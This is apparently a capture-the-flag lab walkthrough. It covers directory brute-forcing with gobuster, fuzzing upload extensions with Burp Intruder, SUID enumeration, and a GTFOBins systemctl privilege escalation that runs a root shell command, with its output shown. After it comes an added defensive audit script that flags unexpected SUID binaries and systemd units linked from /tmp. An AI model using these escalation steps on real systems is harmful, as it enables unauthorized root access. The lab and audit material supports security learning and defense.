Created October 9, 2021 21:42
Locate directories with GoBuster
- gobuster dir -u http://10.10.239.220:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
Compromise server with Burp
- upload file with Burp's browser
- send request to Intruder + in Positions select Sniper attack, add § around the file extension
- in Payloads add a list of file extensions to test + disable payload encoding (at least for this playground)
Search for SUID (set owner user ID upon execution) binaries
- find / -user root -perm -4000 -exec ls -ldb {} \;
For PrivEsc and getting the root flag
- use a slight adaptation of https://gtfobins.github.io/gtfobins/systemctl/
$ TF=$(mktemp).service
$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/flag.txt"
> [Install]
> WantedBy=multi-user.target' > $TF
$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.Cg5cdXxfsZ.service to /tmp/tmp.Cg5cdXxfsZ.service.
Created symlink from /etc/systemd/system/tmp.Cg5cdXxfsZ.service to /tmp/tmp.Cg5cdXxfsZ.service.
$ cat /tmp/flag.txt
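From the defender's side, the two conditions this walkthrough depends on are a SUID binary that should not be there and a systemd unit whose file lives in /tmp (the "Created symlink ... to /tmp/..." lines). The script below is an added audit helper, not part of the gist; it assumes GNU find/readlink on Linux, and the function names, baseline-file format and directory arguments are my own choices.

```shell
#!/bin/sh
# Added defender-side audit (hypothetical helper, not the gist's own commands).
# Two checks for the conditions the write-up above relies on:
#   1. SUID binaries not on an approved baseline (the write-up enumerates
#      them with: find / -user root -perm -4000).
#   2. systemd unit symlinks whose target lives outside the standard unit
#      directories, which is what "systemctl enable" leaves behind when the
#      unit file was written to /tmp (the "Created symlink ..." lines above).
# Assumes GNU find/readlink on Linux. Directory and baseline arguments are
# parameters so the checks can be run against a test tree as a normal user.

# unexpected_suid ROOT BASELINE
# Print SUID regular files under ROOT (one filesystem) that are not listed
# in BASELINE, a file holding one approved absolute path per line.
unexpected_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
        grep -vxF -f "$2"
}

# foreign_unit_links UNITDIR ALLOWED
# Print "*.service" symlinks under UNITDIR (e.g. /etc/systemd/system) whose
# resolved target is not inside one of the colon-separated ALLOWED
# directories (e.g. /etc/systemd/system:/lib/systemd/system:/usr/lib/systemd/system).
foreign_unit_links() {
    find "$1" -type l -name '*.service' 2>/dev/null | while read -r link; do
        target=$(readlink -f "$link") || continue
        ok=0
        oldifs=$IFS; IFS=:
        for dir in $2; do
            case "$target" in "$dir"/*) ok=1 ;; esac
        done
        IFS=$oldifs
        [ "$ok" -eq 1 ] || printf '%s -> %s\n' "$link" "$target"
    done
}

# Real-host usage (needs read access to the whole tree):
#   unexpected_suid / /etc/suid-baseline.txt
#   foreign_unit_links /etc/systemd/system \
#       /etc/systemd/system:/lib/systemd/system:/usr/lib/systemd/system
```

Any path reported by the first check is a candidate for the GTFOBins-style abuse shown above and should be compared against the package manager's expected file modes; any line from the second check points at a unit that can be edited by whoever can write to its real location.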